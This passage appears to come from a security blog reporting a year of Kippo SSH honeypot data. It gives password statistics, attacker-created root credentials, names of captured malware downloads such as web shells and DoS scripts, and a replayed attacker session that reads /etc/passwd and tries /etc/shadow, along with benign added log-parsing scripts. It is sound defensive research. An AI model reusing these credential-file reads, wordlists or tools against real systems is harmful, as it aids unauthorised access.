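sites.xml-style file. The XML below is a constructed stand-in; only the
<site name="..."> convention comes from the help text, the rest of the
layout is assumed."""
import argparse
import xml.etree.ElementTree as ET

# Constructed configuration fragment, not the real sites.xml or tekdefense.xml.
SAMPLE_SITES_XML = """\
<sites>
  <site name="totalhash_ip"><domainurl>https://totalhash.example/ip/</domainurl></site>
  <site name="robtex"><domainurl>https://robtex.example/</domainurl></site>
  <site name="vt_hash"><domainurl>https://vt.example/hash/</domainurl></site>
</sites>
"""


def parse_source_arg(value):
    """Split 'a;b;c' into site names; blanks and surrounding whitespace are dropped."""
    if not value:
        return []
    return [name.strip() for name in value.split(";") if name.strip()]


def select_sites(xml_text, wanted):
    """Return (selected, unknown): the site names to query, in the order they
    were requested, and requested names that do not exist in the configuration.
    An empty request means "every site", mirroring the default when -s is absent."""
    root = ET.fromstring(xml_text)
    by_name = {site.get("name"): site for site in root.iter("site")}
    if not wanted:
        return list(by_name), []
    selected = [n for n in wanted if n in by_name]
    unknown = [n for n in wanted if n not in by_name]
    return selected, unknown


def build_parser():
    parser = argparse.ArgumentParser(description="Automater-style source selection (demo)")
    parser.add_argument("target", help="IP, URL or hash to query")
    parser.add_argument("-s", "--source", help="site names separated by semicolons")
    return parser


def main(argv=None):
    """Parse the command line, warn about unknown site names, report the selection."""
    args = build_parser().parse_args(argv)
    selected, unknown = select_sites(SAMPLE_SITES_XML, parse_source_arg(args.source))
    for name in unknown:
        print("warning: no site named %r in configuration, skipping" % name)
    print("querying %s against: %s" % (args.target, ", ".join(selected)))
    return selected, unknown


if __name__ == "__main__":
    main()
```

One practical point when typing this at a shell: an unquoted `;` ends the command in POSIX shells (and separates statements in PowerShell), so the value has to be quoted, e.g. `-s 'totalhash_ip;robtex'`, or the shell will try to run `robtex` as a second command. Unknown names are reported and skipped rather than silently dropped, so a typo in a site name is visible in the output.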

Lastly, there is now a bot output mode for those who want friendlier output for
bots. For instance, here is the output from Automater with -b in a Skype bot.

Admin | Post a Comment | Share Article
tagged Automater, python in News

BSIDESNOLA 2015 PRESENTATION ON HONEYPOTS

Monday, June 1, 2015 at 6:57PM

Wow, it has been a long time since I have posted. I plan to rectify my posting
frequency problems, starting now. Last weekend @p4r4n0y1ng and I (@TekDefense)
gave a presentation on Honeypots called "Catch More Honeys when you are fly" at
BSidesNola. See the slides below:



I will be publishing a more detailed article on SSHPsychos soon!

tagged Dionaea, ELK, Kippo, SSHPsychos, honeypot in News


OVER A YEAR WITH KIPPO

Sunday, July 20, 2014 at 8:31PM

UPDATE: After posting, @ikoniaris of Honeydrive and Bruteforce fame recommended
running these. Here are the results of kippo-stats.pl, created by Tomasz Miklas
and Miguel Jacq.

As many of you know from previous posts, I am a big fan of honeypots,
particularly Kippo. My main Kippo instance sitting in AWS has been online for
over a year now. Let's take a look at what we have captured and learned over
this past year. If you want to validate any of these statistics I have made the
raw logs available for download.


GENERAL STATS:

Unique values (135526 connections):

*csv with geo location

*Map Generated with JCSOCAL's GIPC

Top 11 Countries

China: 699
United States: 654
Brazil: 76
Russian Federation: 69
Germany: 65
Korea, Republic of: 57
Romania: 56
Egypt: 52
Japan: 50
India: 41
Indonesia: 41

Unique Usernames: 8600 (Username list)

Unique Passwords: 75780 (wordlist)

Unique Sources: 1985 (list of IPs)


PASSWORDS:

One of my favorite uses of Kippo data is to generate wordlists from login
attempts. I wrote a quick script to parse the Kippo logs, pull out all
passwords, and deduplicate them into a wordlist. Feel free to grab it.
Additionally, I made the wordlists available for download.

Using Pipal, I analyzed all the login attempts over this year:

remnux@remnux:~/custom_tools/pipal$ ./pipal.rb ../TekDefense/wordlist.txt
Generating stats, hit CTRL-C to finish early and dump stats on words already processed.

Basic Results

Total entries = 203400
Total unique entries = 75627

Top 10 passwords
123456 = 3561 (1.75%)
12345 = 1550 (0.76%)
password = 1539 (0.76%)
changeme = 1303 (0.64%)
1234 = 1231 (0.61%)
test = 1165 (0.57%)
abc123 = 1000 (0.49%)
123 = 766 (0.38%)
qwerty = 586 (0.29%)
root = 529 (0.26%)

Top 10 base words
root = 2256 (1.11%)
password = 2178 (1.07%)
test = 1853 (0.91%)
admin = 1538 (0.76%)
changeme = 1391 (0.68%)
qwerty = 1114 (0.55%)
oracle = 802 (0.39%)
p@ssw0rd = 709 (0.35%)
qaz2wsx = 708 (0.35%)
qwer = 591 (0.29%)

Password length (length ordered)
1 = 2247 (1.1%)
2 = 1539 (0.76%)
3 = 5589 (2.75%)
4 = 15420 (7.58%)
5 = 17910 (8.81%)
6 = 38125 (18.74%)
7 = 23075 (11.34%)
8 = 33164 (16.3%)
9 = 18631 (9.16%)
10 = 14059 (6.91%)
11 = 8525 (4.19%)
12 = 8627 (4.24%)
13 = 3759 (1.85%)
14 = 2617 (1.29%)
15 = 2025 (1.0%)
16 = 1786 (0.88%)
17 = 826 (0.41%)
18 = 1256 (0.62%)
19 = 520 (0.26%)
20 = 892 (0.44%)
21 = 275 (0.14%)
22 = 190 (0.09%)
23 = 303 (0.15%)
24 = 386 (0.19%)
25 = 172 (0.08%)
26 = 181 (0.09%)
27 = 56 (0.03%)
28 = 77 (0.04%)
29 = 47 (0.02%)
30 = 67 (0.03%)
31 = 111 (0.05%)
32 = 261 (0.13%)
33 = 96 (0.05%)
34 = 90 (0.04%)
35 = 117 (0.06%)
36 = 75 (0.04%)
37 = 19 (0.01%)
38 = 22 (0.01%)
39 = 30 (0.01%)
40 = 9 (0.0%)
41 = 73 (0.04%)
42 = 7 (0.0%)
43 = 3 (0.0%)
44 = 12 (0.01%)
45 = 16 (0.01%)
46 = 15 (0.01%)
47 = 9 (0.0%)
48 = 9 (0.0%)
49 = 20 (0.01%)
50 = 5 (0.0%)
51 = 7 (0.0%)
52 = 8 (0.0%)
54 = 2 (0.0%)
56 = 22 (0.01%)
57 = 1 (0.0%)
60 = 1 (0.0%)
62 = 3 (0.0%)
63 = 1 (0.0%)
64 = 4 (0.0%)
66 = 1 (0.0%)
69 = 2 (0.0%)
71 = 3 (0.0%)

Password length (count ordered)
6 = 38125 (18.74%)
8 = 33164 (16.3%)
7 = 23075 (11.34%)
9 = 18631 (9.16%)
5 = 17910 (8.81%)
4 = 15420 (7.58%)
10 = 14059 (6.91%)
12 = 8627 (4.24%)
11 = 8525 (4.19%)
3 = 5589 (2.75%)
13 = 3759 (1.85%)
14 = 2617 (1.29%)
1 = 2247 (1.1%)
15 = 2025 (1.0%)
16 = 1786 (0.88%)
2 = 1539 (0.76%)
18 = 1256 (0.62%)
20 = 892 (0.44%)
17 = 826 (0.41%)
19 = 520 (0.26%)
24 = 386 (0.19%)
23 = 303 (0.15%)
21 = 275 (0.14%)
32 = 261 (0.13%)
22 = 190 (0.09%)
26 = 181 (0.09%)
25 = 172 (0.08%)
35 = 117 (0.06%)
31 = 111 (0.05%)
33 = 96 (0.05%)
34 = 90 (0.04%)
28 = 77 (0.04%)
36 = 75 (0.04%)
41 = 73 (0.04%)
30 = 67 (0.03%)
27 = 56 (0.03%)
29 = 47 (0.02%)
39 = 30 (0.01%)
38 = 22 (0.01%)
56 = 22 (0.01%)
49 = 20 (0.01%)
37 = 19 (0.01%)
45 = 16 (0.01%)
46 = 15 (0.01%)
44 = 12 (0.01%)
47 = 9 (0.0%)
40 = 9 (0.0%)
48 = 9 (0.0%)
52 = 8 (0.0%)
51 = 7 (0.0%)
42 = 7 (0.0%)
50 = 5 (0.0%)
64 = 4 (0.0%)
43 = 3 (0.0%)
62 = 3 (0.0%)
71 = 3 (0.0%)
54 = 2 (0.0%)
69 = 2 (0.0%)
63 = 1 (0.0%)
66 = 1 (0.0%)
60 = 1 (0.0%)
57 = 1 (0.0%)

[ASCII histogram of password lengths 0-71 not reproduced]

One to six characters = 80830 (39.74%)
One to eight characters = 137069 (67.39%)
More than eight characters = 66331 (32.61%)

Only lowercase alpha = 83305 (40.96%)
Only uppercase alpha = 659 (0.32%)
Only alpha = 83964 (41.28%)
Only numeric = 23069 (11.34%)

First capital last symbol = 1318 (0.65%)
First capital last number = 4224 (2.08%)

Single digit on the end = 10990 (5.4%)
Two digits on the end = 5787 (2.85%)
Three digits on the end = 19356 (9.52%)

Last number
0 = 5035 (2.48%)
1 = 9472 (4.66%)
2 = 5868 (2.88%)
3 = 21244 (10.44%)
4 = 6911 (3.4%)
5 = 5498 (2.7%)
6 = 8139 (4.0%)
7 = 3273 (1.61%)
8 = 3836 (1.89%)
9 = 3934 (1.93%)

[ASCII histogram of last digit 0-9 not reproduced]

Last digit
3 = 21244 (10.44%)
1 = 9472 (4.66%)
6 = 8139 (4.0%)
4 = 6911 (3.4%)
2 = 5868 (2.88%)
5 = 5498 (2.7%)
0 = 5035 (2.48%)
9 = 3934 (1.93%)
8 = 3836 (1.89%)
7 = 3273 (1.61%)

Last 2 digits (Top 10)
23 = 17068 (8.39%)
56 = 5973 (2.94%)
34 = 3792 (1.86%)
45 = 2980 (1.47%)
12 = 2109 (1.04%)
21 = 2072 (1.02%)
11 = 1976 (0.97%)
89 = 1578 (0.78%)
00 = 1135 (0.56%)
10 = 1016 (0.5%)

Last 3 digits (Top 10)
123 = 16664 (8.19%)
456 = 5829 (2.87%)
234 = 3705 (1.82%)
345 = 2588 (1.27%)
321 = 1513 (0.74%)
111 = 1189 (0.58%)
789 = 1168 (0.57%)
678 = 758 (0.37%)
000 = 703 (0.35%)
567 = 672 (0.33%)

Last 4 digits (Top 10)
3456 = 5452 (2.68%)
1234 = 3635 (1.79%)
2345 = 2578 (1.27%)
1111 = 980 (0.48%)
6789 = 858 (0.42%)
5678 = 737 (0.36%)
4321 = 656 (0.32%)
4567 = 649 (0.32%)
3123 = 643 (0.32%)
7890 = 496 (0.24%)

Last 5 digits (Top 10)
23456 = 5439 (2.67%)
12345 = 2571 (1.26%)
56789 = 852 (0.42%)
11111 = 842 (0.41%)
45678 = 710 (0.35%)
34567 = 643 (0.32%)
23123 = 607 (0.3%)
54321 = 508 (0.25%)
67890 = 483 (0.24%)
00000 = 302 (0.15%)

Character sets
loweralpha: 83305 (40.96%)
loweralphanum: 53690 (26.4%)
numeric: 23069 (11.34%)
mixedalphanum: 8112 (3.99%)
loweralphaspecialnum: 7073 (3.48%)
loweralphaspecial: 5802 (2.85%)
mixedalphaspecialnum: 4159 (2.04%)
mixedalpha: 3041 (1.5%)
specialnum: 1849 (0.91%)
special: 1738 (0.85%)
upperalphanum: 1117 (0.55%)
mixedalphaspecial: 1017 (0.5%)
upperalphaspecial: 749 (0.37%)
upperalpha: 659 (0.32%)
upperalphaspecialnum: 364 (0.18%)

Character set ordering
allstring: 87005 (42.78%)
stringdigit: 35764 (17.58%)
othermask: 35359 (17.38%)
alldigit: 23069 (11.34%)
stringdigitstring: 6280 (3.09%)
digitstring: 4939 (2.43%)
stringspecialstring: 2298 (1.13%)
stringspecial: 2217 (1.09%)
stringspecialdigit: 1809 (0.89%)
digitstringdigit: 1756 (0.86%)
allspecial: 1738 (0.85%)
specialstring: 831 (0.41%)
specialstringspecial: 335 (0.16%)

*Gist: Password Statistics from Kippo Honeypot using Pipal

Two items of note here: over 60% of password attempts were 1-8 characters, and
40% of attempts were lowercase alpha characters only. The most used password was
123456, which is the default password for Kippo.
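As an added example, not the author's script and not Pipal, here is a parser that serves both the wordlist paragraph above and the Pipal figures just discussed: it reads Kippo-style authentication log lines, deduplicates the passwords into a wordlist (most-tried first), and computes a few of the same statistics directly (top passwords, share of 1-8 character attempts, lowercase-only and numeric-only shares, last-digit distribution, successful logins). The log lines are constructed in the layout Kippo writes, `login attempt [user/password] failed|succeeded` inside a Twisted log prefix; the prefix layout `HoneyPotTransport,<id>,<ip>` is an assumption, and the IPs and credentials are made up.

```python
"""Added example (not the post's script, not Pipal): parse Kippo-style
authentication log lines into a deduplicated wordlist and compute a few
Pipal-like statistics. The sample lines are constructed in Kippo's
"login attempt [user/password] failed|succeeded" layout; the IPs and
credentials are invented."""
import re
from collections import Counter

# Constructed sample in Kippo's log format (not real honeypot data).
SAMPLE_LOG = """\
2014-07-20 00:50:10+0000 [SSHService ssh-userauth on HoneyPotTransport,10,192.0.2.10] login attempt [root/123456] failed
2014-07-20 00:50:12+0000 [SSHService ssh-userauth on HoneyPotTransport,10,192.0.2.10] login attempt [root/password] failed
2014-07-20 00:50:14+0000 [SSHService ssh-userauth on HoneyPotTransport,10,192.0.2.10] login attempt [root/123456] succeeded
2014-07-20 01:02:31+0000 [SSHService ssh-userauth on HoneyPotTransport,11,198.51.100.7] login attempt [admin/admin123] failed
2014-07-20 01:02:33+0000 [SSHService ssh-userauth on HoneyPotTransport,11,198.51.100.7] login attempt [admin/P@ssw0rd] failed
2014-07-20 01:02:35+0000 [SSHService ssh-userauth on HoneyPotTransport,11,198.51.100.7] login attempt [oracle/oracle] failed
2014-07-20 01:02:37+0000 [SSHService ssh-userauth on HoneyPotTransport,11,198.51.100.7] login attempt [root/123456] failed
2014-07-20 01:02:39+0000 [SSHService ssh-userauth on HoneyPotTransport,11,198.51.100.7] login attempt [root/changeme] failed
"""

# Assumed prefix layout: "[SSHService ssh-userauth on HoneyPotTransport,<id>,<ip>]".
SRC_RE = re.compile(r"HoneyPotTransport,\d+,([0-9a-fA-F.:]+)\]")
# The password may itself contain "/" or "]", so match greedily up to the final result word.
LOGIN_RE = re.compile(r"login attempt \[(?P<user>[^/]*)/(?P<password>.*)\] (?P<result>failed|succeeded)$")


def parse_attempts(log_text):
    """Return one dict per login attempt; other Kippo log lines are skipped."""
    attempts = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if not m:
            continue
        src = SRC_RE.search(line)
        attempts.append({
            "user": m.group("user"),
            "password": m.group("password"),
            "result": m.group("result"),
            "src_ip": src.group(1) if src else None,
        })
    return attempts


def unique_wordlist(attempts):
    """Deduplicated passwords, most frequently tried first (ties alphabetically)."""
    counts = Counter(a["password"] for a in attempts)
    return [pw for pw, _ in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


def password_stats(attempts, top_n=10):
    """A handful of the Pipal-style figures from the post, computed over the attempts."""
    pws = [a["password"] for a in attempts]
    total = len(pws)

    def pct(n):
        return round(100.0 * n / total, 2) if total else 0.0

    counts = Counter(pws)
    one_to_eight = sum(1 for p in pws if 1 <= len(p) <= 8)
    lower_only = sum(1 for p in pws if p.isalpha() and p.islower())
    numeric_only = sum(1 for p in pws if p.isdigit())
    last_digit = Counter(p[-1] for p in pws if p and p[-1].isdigit())
    return {
        "total": total,
        "unique": len(counts),
        "top": counts.most_common(top_n),
        "one_to_eight": (one_to_eight, pct(one_to_eight)),
        "lower_only": (lower_only, pct(lower_only)),
        "numeric_only": (numeric_only, pct(numeric_only)),
        "length_ordered": sorted(Counter(len(p) for p in pws).items()),
        "last_digit": last_digit.most_common(),
        "succeeded": sum(1 for a in attempts if a["result"] == "succeeded"),
    }


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_LOG
    found = parse_attempts(text)
    stats = password_stats(found)
    print("Total entries = %d, unique = %d, successful logins = %d"
          % (stats["total"], stats["unique"], stats["succeeded"]))
    for pw, n in stats["top"]:
        print("%s = %d" % (pw, n))
    with open("wordlist.txt", "w") as fh:  # the deduplicated wordlist, most-tried first
        fh.write("\n".join(unique_wordlist(found)) + "\n")
```

Run it with the path to a Kippo log as the only argument, or with no argument to use the constructed sample. Ordering the wordlist by attempt frequency rather than alphabetically matters when the list is later used to audit your own systems: the entries at the top are the guesses the scanners actually try first. The `succeeded` count is worth watching separately, since a success in Kippo means the attacker was let into a fake shell and a session replay should exist for it.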

If a user attempts to create an account or change the root password in a Kippo
session those passwords are captured and added to the allowed credentials list.
The following credentials were created:

> root:0:albertinoalbert123
> root:0:fgashyeq77dhshfa
> root:0:florian12eu
> root:0:hgd177q891999wwwwwe1.dON
> root:0:iphone5
> root:0:kokot
> root:0:nope
> root:0:picvina
> root:0:scorpi123
> root:0:test
> root:0:xiaozhe
> root:0:12345
> root:0:bnn318da9031kdamfaihheq1fa
> root:0:ls
> root:0:neonhostt1
> root:0:wget123


DOWNLOADS:

When an attacker attempts to download a tool via wget, Kippo allows the file to
be downloaded, although the attacker cannot interact with it. With this we are
able to get a copy of whatever is being downloaded. In most cases these are IRC
bots, but not all. I have made them all available for download.

Here is a listing of all the files:
*Duplicates and obviously legitimate files have been removed from the list.
> 20131030113401_http___198_2_192_204_22_disknyp
> 20131103183232_http___61_132_227_111_8080_meimei
> 20131104045744_http___198_2_192_204_22_disknyp
> 20131114214017_http___www_unrealircd_com_downloads_Unreal3_2_8_1_tar_gz
> 20131116130541_http___198_2_192_204_22_disknyp
> 20131129165151_http___dl_dropboxusercontent_com_s_1bxj9ak8m1octmk_ktx_c
> 20131129165438_http___dl_dropboxusercontent_com_s_66gpt66lvut4gdu_ktx
> 20131202040921_http___198_2_192_204_22_disknyp
> 20131207123419_http___packetstorm_wowhacker_com_DoS_juno_c
> 20131216143108_http___www_psybnc_at_download_beta_psyBNC_2_3_2_7_tar_gz
> 20131216143208_http___X_hackersoft_org_scanner_gosh_jpg
> 20131216143226_http___download_microsoft_com_download_win2000platform_SP_SP3_NT5_EN_US_W2Ksp3_exe
> 20131217163423_http___ha_ckers_org_slowloris_slowloris_pl
> 20131217163456_http___www_lemarinel_net_perl
> 20131222084315_http___maxhub_com_auto_bill_pipe_bot
> 20140103142644_http___ftp_gnu_org_gnu_autoconf_autoconf_2_69_tar_gz
> 20140109170001_http___sourceforge_net_projects_cpuminer_files_pooler_cpuminer_2_3_2_linux_x86_tar_gz
> 20140120152204_http___111_39_43_54_5555_dos32
> 20140122202342_http___layer1_cpanel_net_latest
> 20140122202549_http___linux_duke_edu_projects_yum_download_2_0_yum_2_0_7_tar_gz
> 20140122202751_http___www_ehcp_net_ehcp_latest_tgz
> 20140201131804_http___www_suplementar_com_br_images_stories_goon_pooler_cpuminer_2_3_2_tar_gz
> 20140201152307_http___nemo_rdsor_ro_darwin_jpg
> 20140208081358_http___www_youtube_com_watch_v_6hVQs5ll064
> 20140208184835_http___sharplase_ru_x_txt
> 20140215141909_http___tenet_dl_sourceforge_net_project_cpuminer_pooler_cpuminer_2_3_2_tar_gz
> 20140215142830_http___sourceforge_net_projects_cpuminer_files_pooler_cpuminer_2_3_2_tar_gz
> 20140219072721_http___www_psybnc_at_download_beta_psyBNC_2_3_2_7_tar_gz
> 20140328031725_http___dl_dropboxusercontent_com_u_133538399_multi_py
> 20140409053322_http___www_c99php_com_shell_c99_rar
> 20140409053728_http___github_com_downloads_orbweb_PHP_SHELL_WSO_wso2_5_1_php
> 20140413130110_http___www_iphobos_com_hb_unixcod_rar
> 20140416194008_http___linux_help_bugs3_com_Camel_mail_txt
> 20140419143734_http___www_activestate_com_activeperl_downloads_thank_you_dl_http___downloads_activestate_com_ActivePerl_releases_5_18_2_1802_ActivePerl_5_18_2_1802_x86_64_linux_glibc_2_5_298023_tar_gz
> 20140419144043_http___ha_ckers_org_slowloris_slowloris_pl
> 20140420104056_http___downloads_metasploit_com_data_releases_archive_metasploit_4_9_2_linux_x64_installer_run
> 20140420104325_http___nmap_org_dist_nmap_6_46_1_i386_rpm
> 20140505073503_http___116_255_239_180_888_007
> 20140505093229_http___119_148_161_25_805_sd32
> 20140505111511_http___112_117_223_10_280_1
> 20140515091557_http___112_117_223_10_280__bash_6_phpmysql
> 20140519193800_http___www_unrealircd_com_downloads_Unreal3_2_8_1_tar_gz
> 20140523120411_http___lemonjuice_tk_netcat_sh
> 20140610174516_http___59_63_183_193_280__etc_Test8888
> 20140614200901_http___kismetismy_name_ktx
> 20140625032113_http___ftp_mirrorservice_org_sites_ftp_wiretapped_net_pub_security_packet_construction_netcat_gnu_netcat_netcat_0_7_1_tar_gz
> 20140720005010_http___www_bl4ck_viper_persiangig_com_p8_localroots_2_6_x_cw7_3

To see the full source for some of the scripts downloaded by the attackers you
can go to this Github Repo. A couple of my favorite ones.
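Kippo names each captured wget download from the capture time and the requested URL, which is why every entry in the listing above starts with a 14-digit timestamp followed by the URL with every non-alphanumeric character replaced by an underscore. The timestamp is exact, but the URL survives only as underscore-separated tokens (dots and slashes are indistinguishable), so reconstruction is lossy. The following is an added example, not from the post, that parses the listing into timestamp and tokens, counts captures per month, and tags each entry with a rough category from a small token table of my own; the filenames are a subset of the listing above and the category labels are assumptions.

```python
"""Added example (not from the post): triage Kippo's captured-download
filenames. Kippo saves a wget capture as <YYYYmmddHHMMSS>_<URL with every
non-alphanumeric character replaced by "_">, so the timestamp is exact but
the URL survives only as tokens. The names below are taken from the post's
listing; the token-to-category table is my own rough labelling."""
import re
from collections import Counter
from datetime import datetime

# Subset of the filenames listed in the post.
SAMPLE_DL_NAMES = [
    "20131030113401_http___198_2_192_204_22_disknyp",
    "20131114214017_http___www_unrealircd_com_downloads_Unreal3_2_8_1_tar_gz",
    "20131207123419_http___packetstorm_wowhacker_com_DoS_juno_c",
    "20131216143108_http___www_psybnc_at_download_beta_psyBNC_2_3_2_7_tar_gz",
    "20131217163423_http___ha_ckers_org_slowloris_slowloris_pl",
    "20140109170001_http___sourceforge_net_projects_cpuminer_files_pooler_cpuminer_2_3_2_linux_x86_tar_gz",
    "20140409053322_http___www_c99php_com_shell_c99_rar",
    "20140523120411_http___lemonjuice_tk_netcat_sh",
]

NAME_RE = re.compile(r"^(?P<ts>\d{14})_(?P<url>.+)$")

# Lower-cased URL token -> category. Assumed labels; extend for your own captures.
TOKEN_CATEGORY = {
    "cpuminer": "miner",
    "psybnc": "irc", "unrealircd": "irc",
    "slowloris": "dos", "dos": "dos",
    "c99": "webshell", "wso2": "webshell",
}


def parse_dl_name(name):
    """Split a capture filename into its timestamp and sanitized-URL tokens.
    Returns None for names that do not follow Kippo's convention."""
    m = NAME_RE.match(name)
    if not m:
        return None
    return {
        "name": name,
        "timestamp": datetime.strptime(m.group("ts"), "%Y%m%d%H%M%S"),
        "tokens": [t for t in m.group("url").split("_") if t],
    }


def categorize(tokens):
    """First token with a known label wins; anything unrecognized is 'unknown'."""
    for t in tokens:
        cat = TOKEN_CATEGORY.get(t.lower())
        if cat:
            return cat
    return "unknown"


def summarize(names):
    """Captures per month, per category, plus the entries nobody has labelled yet."""
    parsed = [p for p in (parse_dl_name(n) for n in names) if p]
    return {
        "count": len(parsed),
        "by_month": dict(Counter(p["timestamp"].strftime("%Y-%m") for p in parsed)),
        "by_category": dict(Counter(categorize(p["tokens"]) for p in parsed)),
        "unknown": [p["name"] for p in parsed if categorize(p["tokens"]) == "unknown"],
    }


if __name__ == "__main__":
    import os
    import sys
    # Pass the dl/ directory of a Kippo install, or run without arguments on the sample.
    names = sorted(os.listdir(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_DL_NAMES
    report = summarize(names)
    print("captures: %d" % report["count"])
    for month, n in sorted(report["by_month"].items()):
        print("  %s: %d" % (month, n))
    for cat, n in sorted(report["by_category"].items()):
        print("  %s: %d" % (cat, n))
    print("unlabelled: %s" % ", ".join(report["unknown"]))
```

The `unknown` list is the useful output for triage: those are the captures (the bare-IP `disknyp` binaries in the listing, for instance) that need a hash lookup or sandbox run rather than a filename glance, while the keyword-tagged ones match tools the post already identifies (miners, IRC bouncers, DoS scripts, web shells).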



TTY REPLAY SESSIONS:

My absolute favorite feature of Kippo is the ability to replay interactive
sessions of attacker activity. Watching these replays gives us an idea of what
attackers do once inside a session. For instance, almost every session begins
with "w", which shows logged-in users and uptime, and then "uname -a" to show
them system details. I made a YouTube series called The Kippo Kronicles a while
back to showcase some of these sessions. While I don't have the time necessary
to continue putting up videos for each session, I have put the output of each
session up at this GitHub repo.

Here is a fun example:
> AWSWeb:~# adduser
> adduser: Only one or two names allowed.
> AWSWeb:~# useradd
> adduser: Only one or two names allowed.
> AWSWeb:~# ls
> AWSWeb:~# pwd
> root
> AWSWeb:~# cd /cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bin/sh
> list:x:38:38:Mailing List Manager:/var/list:/bin/sh
> irc:x:39:39:ircd:/var/run/ircd:/bin/sh
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
> nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
> libuuid:x:100:101::/var/lib/libuuid:/bin/sh
> richard:x:1000:1000:richard,,,:/home/richard:/bin/bash
> sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
> AWSWeb:~# user
> bash: user: command not found
> AWSWeb:~# adduser obz
> Adding user `obz' ...
> Adding new group `obz' (1001) ...
> Adding new user `obz' (1001) with group `obz' ...
> Creating home directory `/home/obz' ...
> Copying files from `/etc/skel' ...
> Password: 
> Password again: 
> 
> Changing the user information for obz
> Enter the new value, or press ENTER for the default
>         Username []: 
> Must enter a value!
>         Username []: obz
>         Full Name []: ladmin obz
>         Room Number []: 1
>         Work Phone []: 1234567890
>         Home Phone []: 
> Must enter a value!
>         Home Phone []: 0
>         Mobile Phone []: 0
>         Country []: cn
>         City []: xang
>         Language []: mand
>         Favorite movie []: 1
>         Other []: 1
> Is the information correct? [Y/n] y
> ERROR: Some of the information you entered is invalid
> Deleting user `obz' ...
> Deleting group `obz' (1001) ...
> Deleting home directory `/home/obz' ...
> Try again? [Y/n] y
> 
> Changing the user information for obz
> Enter the new value, or press ENTER for the default
>         Username []: obx
>         Full Name []: obx toor
>         Room Number []: 1
>         Work Phone []: 19089543121
>         Home Phone []: 9089342135
>         Mobile Phone []: 9089439012
>         Country []: cn
>         City []: xang
>         Language []: manenglish
>         Favorite movie []: one
>         Other []: twofour
> Is the information correct? [Y/n] y
> ERROR: Some of the information you entered is invalid
> Deleting user `obz' ...
> Deleting group `obz' (1001) ...
> Deleting home directory `/home/obz' ...
> Try again? [Y/n] n
> AWSWeb:~# cat adduser obz user cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/bin/sh
> bin:x:2:2:bin:/bin:/bin/sh
> sys:x:3:3:sys:/dev:/bin/sh
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/bin/sh
> man:x:6:12:man:/var/cache/man:/bin/sh
> lp:x:7:7:lp:/var/spool/lpd:/bin/sh
> mail:x:8:8:mail:/var/mail:/bin/sh
> news:x:9:9:news:/var/spool/news:/bin/sh
> uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
> proxy:x:13:13:proxy:/bin:/bin/sh
> www-data:x:33:33:www-data:/var/www:/bin/sh
> backup:x:34:34:backup:/var/backups:/bin/sh
> list:x:38:38:Mailing List Manager:/var/list:/bin/sh
> irc:x:39:39:ircd:/var/run/ircd:/bin/sh
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
> nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
> libuuid:x:100:101::/var/lib/libuuid:/bin/sh
> richard:x:1000:1000:richard,,,:/home/richard:/bin/bash
> sshd:x:101:65534::/var/run/sshd:/usr/sbin/nologin
> AWSWeb:~# cat /etc/shadow
> cat: /etc/shadow: No such file or directory
> AWSWeb:~# /etc/init.d\D/ssh start
> bash: /etc/init.D/ssh: command not found
> AWSWeb:~# /etc/init.D/ssh
> startd
> bash: /etc/init.d/ssh: command not found
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# 
> AWSWeb:~# exit
> cConnection to server closed.
> localhost:~# exit
> Connection to server closed.
> localhost:~# bye
> bash: bye: command not found
> localhost:~# exit
> Connection to server closed.
> localhost:~# admin
> bash: admin: command not found
> localhost:~# su
> localhost:~# ls -l
> drwxr-xr-x 1 root root 4096 2013-02-03 17:11 .
> drwxr-xr-x 1 root root 4096 2013-02-03 17:11 ..
> drwxr-xr-x 1 root root 4096 2009-11-06 11:16 .debtags
> -rw------- 1 root root 5515 2009-11-20 09:08 .viminfo
> drwx------ 1 root root 4096 2009-11-06 11:13 .aptitude
> -rw-r--r-- 1 root root  140 2009-11-06 11:09 .profile
> -rw-r--r-- 1 root root  412 2009-11-06 11:09 .bashrc
> localhost:~# pwd
> /root
> localhost:~# cd /
> localhost:/# ls -l
> drwxr-xr-x 1 root root  4096 2013-02-03 17:11 .
> drwxr-xr-x 1 root root  4096 2013-02-03 17:11 ..
> drwxr-xr-x 1 root root     0 2009-11-20 08:19 sys
> drwxr-xr-x 1 root root  4096 2009-11-08 15:42 bin
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 mnt
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 media
> lrwxrwxrwx 1 root root    25 2009-11-06 11:16 vmlinuz ->
> /boot/vmlinuz-2.6.26-2-686
> drwxr-xr-x 1 root root  4096 2009-11-06 11:09 opt
> lrwxrwxrwx 1 root root    11 2009-11-06 11:08 cdrom -> /media/cdrom0
> drwxr-xr-x 1 root root  4096 2009-11-06 11:08 selinux
> drwxrwxrwx 1 root root  4096 2009-11-20 08:19 tmp
> dr-xr-xr-x 1 root root     0 2009-11-20 08:19 proc
